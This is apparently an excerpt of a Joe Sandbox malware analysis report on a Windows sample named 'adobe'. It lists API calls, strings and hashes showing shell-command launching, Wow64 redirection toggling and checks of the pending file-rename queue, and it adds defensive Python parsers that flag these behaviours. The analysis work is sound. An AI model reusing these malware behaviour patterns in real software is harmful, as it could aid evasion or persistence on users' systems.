• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Window$CreateFocus$ActiveClassRegisterShow
• String ID: TWindowDisabler-Window
• API String ID: 3167913817-1824977358
• Opcode ID: 6e075dc944e6bccec8fc0ef0846665b26f07f281cab91b1318fedc60cd50076b
• Instruction ID: a85808fe2fc477e6bfefb4b7344e4229cc17534778a3dce562db4a9d559d1a3d
• Opcode Fuzzy Hash: 6e075dc944e6bccec8fc0ef0846665b26f07f281cab91b1318fedc60cd50076b
• Instruction Fuzzy Hash: 6921A371740710BAE220EF619D03F1B76A4EB14B44FA0813BF904AB2D1D7BC6D5486EE
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528F9,?,?,?,?,00000000,?,004972C9), ref: 00452880
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452886
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528F9,?,?,?,?,00000000,?,004972C9), ref: 0045289A
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004528A0
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
• API String ID: 1646373207-2130885113
• Opcode ID: 014cbfd88cbada2ba2f6fc5422e975ead1d93f81a2bbc97b1ed3d865edbeb017
• Instruction ID: 38ce7f80dd5b36a1f2e55088805320c2eb6a0e4d57c6e62c3df02668c3b9852d
• Opcode Fuzzy Hash: 014cbfd88cbada2ba2f6fc5422e975ead1d93f81a2bbc97b1ed3d865edbeb017
• Instruction Fuzzy Hash: 470184B0700304AED701ABA29D03B9B3A58E756726F50443BF800A6297D7FC5818CA7D
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegisterClipboardFormatA.USER32(commdlg_help), ref: 004307BC
• RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004307CB
• GetCurrentThreadId.KERNEL32 ref: 004307E5
• GlobalAddAtomA.KERNEL32(00000000), ref: 00430806
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
• String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
• API String ID: 4130936913-2943970505
• Opcode ID: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
• Instruction ID: a6afac4a95f2c597deb8a3c09a724b63b9622156ea849986cff8ddd49ab29b56
• Opcode Fuzzy Hash: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
• Instruction Fuzzy Hash: 68F082705583408ED700FB2588027197BE4EB98308F044A7FB498A62E1D77E8510CB9F
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00454758,00454758,00000031,00454758,00000000), ref: 004546E6
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00454758,00454758,00000031,00454758), ref: 004546F3
  • Part of subcall function 004544A8: WaitForInputIdle.USER32(00000001,00000032), ref: 004544D4
  • Part of subcall function 004544A8: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004544F6
  • Part of subcall function 004544A8: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454505
  • Part of subcall function 004544A8: CloseHandle.KERNEL32(00000001,00454532,0045452B,?,00000031,00000080,00000000,?,?,0045488B,00000080,0000003C,00000000,004548A1), ref: 00454525
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
• String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
• API String ID: 854858120-615399546
• Opcode ID: 16bd8859f69d7ba7d01eaf290ec18c35fb36c9f0db53f45a1a4ed95e06a92c12
• Instruction ID: 5898c24bda719508e952bf5cb01f3f8a52e5154d5b1a7f0c1159f75b82703416
• Opcode Fuzzy Hash: 16bd8859f69d7ba7d01eaf290ec18c35fb36c9f0db53f45a1a4ed95e06a92c12
• Instruction Fuzzy Hash: 67513C30A0034DABDB01EF95C882BDEBBB9AF45309F514437F8047B286D77C5A498759
Uniqueness
Uniqueness Score: -1.00%
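
The function entries on this page (an APIs bullet list, a Similarity block whose String ID joins the function's literals with "$", and a Uniqueness Score line) are easy to read one at a time but tedious to triage in bulk. The Python below is an added example written for this page, not Joe Sandbox code or output: it parses that layout into records and applies the editor's own heuristics to flag the combinations that matter in this report, namely imports resolved at run time through GetModuleHandleA/GetProcAddress, the Wow64DisableWow64FsRedirection/Wow64RevertWow64FsRedirection strings, and the `cmd.exe" /C` / `COMMAND.COM" /C` launch strings. The embedded SAMPLE is constructed by copying the Wow64 entry and the cmd.exe entry from this page with the repeated memory-dump metadata left out; the flag names are assumptions of this example, not Joe Sandbox signatures.

```python
"""Parse the per-function blocks of a Joe Sandbox function listing and flag the
API/string combinations worth a second look. Added example for this page, not
Joe Sandbox code; flag names are the editor's own heuristics, not Joe signatures."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: the Wow64 and cmd.exe entries from this page, minus the
# memory-dump metadata, which is identical for every function on the page.
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528F9,?,?,?,?,00000000,?,004972C9), ref: 00452880
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452886
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
• API String ID: 1646373207-2130885113
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00454758,00454758,00000031,00454758,00000000), ref: 004546E6
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00454758,00454758,00000031,00454758), ref: 004546F3
  • Part of subcall function 004544A8: WaitForInputIdle.USER32(00000001,00000032), ref: 004544D4
  • Part of subcall function 004544A8: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454505
Similarity
• API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
• String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
• API String ID: 854858120-615399546
Uniqueness
Uniqueness Score: -1.00%
"""

# One API call line; the optional prefix marks calls Joe attributes to a callee.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<value>.*?)\s*$")
SCORE_RE = re.compile(r"Uniqueness Score:\s*(?P<score>-?\d+(?:\.\d+)?)%")
LOADERS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}
SHELL_RE = re.compile(r'(?:cmd\.exe|COMMAND\.COM)"?\s*/C', re.IGNORECASE)


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # callee address on 'Part of subcall function' lines


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    api_id: str = ""
    strings: List[str] = field(default_factory=list)
    uniqueness: Optional[float] = None


def parse_entries(text: str) -> List[FunctionEntry]:
    """Start a record at every 'APIs' header and fill it from the lines that follow."""
    entries: List[FunctionEntry] = []
    section = ""
    for line in text.splitlines():
        stripped = line.strip()
        if stripped in ("APIs", "Strings", "Similarity", "Uniqueness"):
            section = stripped
            if section == "APIs":
                entries.append(FunctionEntry())
            continue
        if not entries:
            continue
        cur = entries[-1]
        score, call, fld = SCORE_RE.search(stripped), CALL_RE.match(line), FIELD_RE.match(line)
        if score:
            cur.uniqueness = float(score.group("score"))
        elif section == "APIs" and call:
            sub = call.group("sub")
            cur.calls.append(ApiCall(call.group("name"), call.group("module"), call.group("args") or "",
                                     int(call.group("ref"), 16), int(sub, 16) if sub else None))
        elif section == "Similarity" and fld:
            key, value = fld.group("key"), fld.group("value")
            if key == "API ID":
                cur.api_id = value
            elif key == "String ID":
                # Joe joins literals with '$'; a literal that itself contains '$' is split too.
                cur.strings = [s for s in value.split("$") if s]
    return entries


def triage(entry: FunctionEntry) -> List[str]:
    names = {c.name for c in entry.calls}
    flags = []
    if "GetProcAddress" in names and names & LOADERS:
        flags.append("dynamic-api-resolution")   # imports resolved at run time, not via the IAT
    if any(s.startswith("Wow64") for s in entry.strings):
        flags.append("wow64-fs-redirection")     # 32-bit code reaching the native System32
    if any(SHELL_RE.search(s) for s in entry.strings):
        flags.append("shell-command-execution")  # builds a cmd.exe / COMMAND.COM command line
    return flags


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(f"{e.api_id:<64} calls={len(e.calls):<2} flags={triage(e)}")
```

Run as a script it prints one line per entry; fed the whole listing instead of SAMPLE, the same rules single out the two entries above among the rest. Treat the flags as leads rather than verdicts: resolving the Wow64 exports through GetProcAddress is also what any 32-bit program must do to stay loadable on Windows versions that lack those exports, so that flag on its own says nothing about intent.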

APIs
• LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
• GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
• OemToCharA.USER32(?,?), ref: 0042376C
• CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Char$FileIconLoadLowerModuleName
• String ID: 2$MAINICON
• API String ID: 3935243913-3181700818
• Opcode ID: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
• Instruction ID: 37f11e164b18fdaff452b8e89fdec3e7ced50b804c3530562fc3ce32e09f0af8
• Opcode Fuzzy Hash: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
• Instruction Fuzzy Hash: BF319370A042549ADF10EF2988857C67BE8AF14308F4441BAE844DB393D7BED988CB95
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
• GetCurrentThreadId.KERNEL32 ref: 00418F89
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
  • Part of subcall function 004230D8: 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
  • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
  • Part of subcall function 004230D8: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
  • Part of subcall function 004230D8: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
  • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
  • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
  • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
  • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
  • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
  • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
  • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
  • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
• String ID: ControlOfs%.8X%.8X$Delphi%.8X
• API String ID: 3864787166-2767913252
• Opcode ID: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
• Instruction ID: 8205fbe5be641bff71b9ea3a28b72145380c35a95610ff2efd46362842c0834c
• Opcode Fuzzy Hash: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
• Instruction Fuzzy Hash: C1112EB06142409AC740FF76994268A7BE19B6431CF40943FF888EB2D1DB7D99548B5F
Uniqueness

Uniqueness Score: -1.00%
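The entry above is consistent with Delphi VCL start-up code (the `Delphi%.8X` and `ControlOfs%.8X%.8X` atom names), and its subcall at 0041F128 shows a pattern worth pulling out of any report of this kind: SetErrorMode(00008000), which is SEM_NOOPENFILEERRORBOX, then LoadLibraryA("CTL3D32.DLL") by bare name, then a run of GetProcAddress lookups. A DLL loaded by bare name resolves through the normal DLL search order, and with that error mode a missing DLL fails silently. The following Python is an added example, not code from the Joe Sandbox report: it parses lines in the report's "APIs" layout (bullet, optional "Part of subcall function" prefix, `Api.MODULE(args), ref: addr`) and extracts the run-time library loads, the export names fetched via GetProcAddress, loads made with the error box suppressed, and the raw-address entries the IDA plugin could not name (`73A1A570.USER32`). The sample lines are copied from the entry above; the file and function names are the example's own.

```python
import re

# Constructed sample input: "APIs" lines copied from the report entry above, in the
# Joe Sandbox layout. The bullet is U+2022; the regex below uses the same character.
SAMPLE_LINES = """
• GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
• GetCurrentThreadId.KERNEL32 ref: 00418F89
  • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
  • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
  • Part of subcall function 004230D8: 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
"""

# One report line: optional subcall prefix, Api.MODULE, optional "(args)", "ref: addr".
# Some entries (GetCurrentThreadId above) carry no argument list at all.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z0-9_@]+)\.(?P<module>[A-Za-z0-9_.]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

SEM_NOOPENFILEERRORBOX = 0x8000  # SetErrorMode flag: no "DLL not found" dialog


def parse_api_lines(text):
    """Turn report lines into dicts; lines that do not match the layout are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") else []
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": args, "ref": m.group("ref"), "callee": m.group("callee")})
    return calls


def dynamic_imports(calls):
    """Libraries passed to LoadLibrary* and export names passed to GetProcAddress."""
    libs = [c["args"][0] for c in calls if c["api"].startswith("LoadLibrary") and c["args"]]
    procs = [c["args"][1] for c in calls if c["api"] == "GetProcAddress" and len(c["args"]) > 1]
    return libs, procs


def quiet_loads(calls):
    """LoadLibrary* calls that follow, in listing order, a SetErrorMode call with
    SEM_NOOPENFILEERRORBOX set, so a missing DLL would not raise a dialog."""
    quiet = False
    out = []
    for c in calls:
        if c["api"] == "SetErrorMode" and c["args"]:
            try:
                quiet = bool(int(c["args"][0], 16) & SEM_NOOPENFILEERRORBOX)
            except ValueError:
                quiet = False
        elif c["api"].startswith("LoadLibrary") and c["args"] and quiet:
            out.append(c["args"][0])
    return out


def unresolved_apis(calls):
    """Entries whose 'name' is a raw 8-digit address the IDA plugin could not resolve."""
    return [c for c in calls if re.fullmatch(r"[0-9A-F]{8}", c["api"])]


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_LINES)
    libs, procs = dynamic_imports(calls)
    print("loaded at run time:", libs)
    print("resolved by name:", procs)
    print("loaded with error box suppressed:", quiet_loads(calls))
    print("unresolved:", [(c["api"], c["module"], c["ref"]) for c in unresolved_apis(calls)])
```

Run it on the full "APIs" text of a report to get the complete run-time import set in one pass; the `callee` field keeps the "Part of subcall function" attribution so a name can be traced back to the function that actually resolves it.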

APIs
• SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
• GetWindowLongA.USER32(?,000000F0), ref: 0041367F
• GetWindowLongA.USER32(?,000000F4), ref: 00413691
• SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
• SetPropA.USER32(?,00000000,00000000), ref: 004136BB
• SetPropA.USER32(?,00000000,00000000), ref: 004136D2
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: LongWindow$Prop
• String ID:
• API String ID: 3887896539-0
• Opcode ID: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
• Instruction ID: 1bc0ad651c9199286e8a44efdb6fe1d3d914d8875e882f3995fbdb6b4a12be9e
• Opcode Fuzzy Hash: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
• Instruction Fuzzy Hash: BD11DD75500244BFDB00DF9DDC84E9A3BECEB19364F104676B918DB2A1D738D990CB94
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454D9B,?,00000000,00454DDB), ref: 00454CE1
Strings
• PendingFileRenameOperations2, xrefs: 00454CB0
• WININIT.INI, xrefs: 00454D10
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454C64
• PendingFileRenameOperations, xrefs: 00454C80
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
• API String ID: 47109696-2199428270
• Opcode ID: 58b4bd1b0b787c5f2ac193920b061fab1f2066d87e26b8992d7b5e22dbc5c793
• Instruction ID: f0141262be7a00e61dcd825f0f006365f3ff03c75eb903519351dbfe0bd0c0d1
• Opcode Fuzzy Hash: 58b4bd1b0b787c5f2ac193920b061fab1f2066d87e26b8992d7b5e22dbc5c793
• Instruction Fuzzy Hash: 13519B70E002089FDB11EF61DC519DEB7B9EB84309F50857BE804EB282D778AE49CA18
Uniqueness

Uniqueness Score: -1.00%
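The entry above shows the sample consulting `PendingFileRenameOperations` and `PendingFileRenameOperations2` under `SYSTEM\CurrentControlSet\Control\Session Manager`, with `WININIT.INI` as a legacy fallback. That value is the boot-time rename and delete queue written by MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT; installers read it to decide whether a reboot is pending, and it is also where files can be scheduled for replacement or removal before any user-mode process runs. On a host where this sample executed, the queue is worth decoding during response. The following Python is an added example, not code from the report: it decodes the REG_MULTI_SZ pair list (source, destination; empty destination means delete, a leading `!` on the destination is the MOVEFILE_REPLACE_EXISTING marker, paths carry the NT `\??\` prefix) and the `[rename]` section of a Win9x-style WININIT.INI (`destination=source`, `NUL=` meaning delete). The sample values are constructed for the example; the live registry read only runs on Windows.

```python
import os

# Constructed sample: what winreg returns for a REG_MULTI_SZ PendingFileRenameOperations
# value (a flat list of strings, source/destination pairs). Paths are made up.
SAMPLE_VALUES = [
    "\\??\\C:\\ProgramData\\example\\old.tmp", "",                                   # delete at boot
    "\\??\\C:\\ProgramData\\example\\new.dll", "!\\??\\C:\\ProgramData\\example\\app.dll",  # replace existing
    "\\??\\C:\\Users\\u\\a.txt", "\\??\\C:\\Users\\u\\b.txt",                     # plain rename
]

# Constructed sample of the legacy WININIT.INI [rename] section the sample also checks.
SAMPLE_WININIT = """[rename]
NUL=C:\\TEMP\\OLD.TMP
C:\\APP\\APP.DLL=C:\\TEMP\\NEW.DLL
"""

PENDING_KEY = r"SYSTEM\CurrentControlSet\Control\Session Manager"
PENDING_VALUES = ("PendingFileRenameOperations", "PendingFileRenameOperations2")


def strip_nt_prefix(path):
    """Drop the NT object-manager prefix MoveFileEx stores in the registry."""
    return path[4:] if path.startswith("\\??\\") else path


def decode_pending_renames(values):
    """Decode (source, destination) pairs into (op, source, destination) tuples.
    An empty destination means delete; a leading '!' means replace an existing target.
    A trailing unpaired string (malformed value) is ignored rather than guessed at."""
    ops = []
    for i in range(0, len(values) - 1, 2):
        src, dst = values[i], values[i + 1]
        if dst == "":
            ops.append(("delete", strip_nt_prefix(src), None))
        else:
            op = "replace" if dst.startswith("!") else "rename"
            ops.append((op, strip_nt_prefix(src), strip_nt_prefix(dst.lstrip("!"))))
    return ops


def parse_wininit_rename(ini_text):
    """Parse the [rename] section of WININIT.INI: destination=source, NUL means delete."""
    ops = []
    in_section = False
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[rename]"
            continue
        if in_section and "=" in line:
            dst, src = (s.strip() for s in line.split("=", 1))
            ops.append(("delete", src, None) if dst.upper() == "NUL" else ("rename", src, dst))
    return ops


def read_live_queue():
    """Read both values the sample consults from the live registry (Windows only)."""
    if os.name != "nt":
        return []
    import winreg
    ops = []
    for name in PENDING_VALUES:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, PENDING_KEY) as key:
                data, kind = winreg.QueryValueEx(key, name)
        except OSError:
            continue  # value absent: nothing queued under that name
        if kind == winreg.REG_MULTI_SZ:
            ops.extend(decode_pending_renames(data))
    return ops


if __name__ == "__main__":
    for op in decode_pending_renames(SAMPLE_VALUES) + parse_wininit_rename(SAMPLE_WININIT):
        print(op)
    for op in read_live_queue():
        print("live:", op)
```

During response, anything in this queue that targets a directory the sample wrote to (or deletes one of its own artifacts) is evidence of reboot-deferred activity that a file-system snapshot taken before the reboot will not show.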

APIs
• EnumWindows.USER32(00423A2C), ref: 00423AB8
• GetWindow.USER32(?,00000003), ref: 00423ACD
• GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
• SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
